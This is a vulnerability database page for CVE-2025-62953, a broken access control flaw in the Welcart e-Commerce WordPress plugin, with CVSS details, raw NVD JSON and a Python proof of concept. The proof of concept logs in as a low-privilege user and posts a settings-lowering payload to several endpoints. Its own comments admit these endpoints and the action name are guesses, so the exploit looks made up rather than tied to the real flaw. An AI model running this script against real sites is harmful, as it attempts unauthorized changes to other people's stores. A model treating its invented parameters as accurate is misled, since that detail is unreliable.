Security Vulnerability Report
中文
CVE-2025-62953 CVSS 4.3 MEDIUM

CVE-2025-62953

Published: 2025-10-27 02:15:56
Last Modified: 2026-04-27 17:16:38

Description

Missing Authorization vulnerability in info@welcart Welcart e-Commerce usc-e-shop allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Welcart e-Commerce: from n/a through <= 2.11.24.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Welcart e-Commerce (usc-e-shop) <= 2.11.24

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62953 PoC - Welcart e-Commerce Broken Access Control # Affected: Welcart e-Commerce plugin <= 2.11.24 import requests import sys target = input("Enter target URL (e.g., https://example.com): ").rstrip('/') # Identify WordPress installation wp_admin_url = f"{target}/wp-admin" session = requests.Session() # Login as low-privilege user (subscriber/contributor) login_url = f"{target}/wp-login.php" credentials = { 'log': input("Username: "), 'pwd': input("Password: "), 'wp-submit': 'Log In', 'redirect_to': wp_admin_url, 'testcookie': '1' } print("[*] Logging in as low-privilege user...") response = session.post(login_url, data=credentials) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Login failed!") sys.exit(1) print("[+] Login successful!") # Exploit: Modify access control security level settings # Target endpoint varies - check plugin documentation # Common vulnerable endpoints: # /wp-admin/admin-ajax.php # /wp-json/wp/v2/settings exploit_endpoints = [ f"{target}/wp-admin/admin-ajax.php", f"{target}/wp-admin/options-general.php", f"{target}/wp-json/usce/v1/settings" ] print("[*] Attempting to exploit broken access control...") for endpoint in exploit_endpoints: # Generic payload - specific parameters depend on actual vulnerable function payload = { 'action': 'usce_security_level_update', 'security_level': 'low', # Modify security configuration 'nonce': '' # May not be required due to missing authorization } try: response = session.post(endpoint, data=payload, timeout=10) if response.status_code == 200: print(f"[+] Possible vulnerability at: {endpoint}") print(f" Response: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("\n[*] PoC execution completed.") print("[*] Note: Actual exploitation requires identifying specific vulnerable endpoint.") print("[*] Recommendation: Upgrade to Welcart e-Commerce > 2.11.24")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62953", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:55.660", "lastModified": "2026-04-27T17:16:37.617", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in info@welcart Welcart e-Commerce usc-e-shop allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Welcart e-Commerce: from n/a through <= 2.11.24."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/usc-e-shop/vulnerability/wordpress-welcart-e-commerce-plugin-2-11-24-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}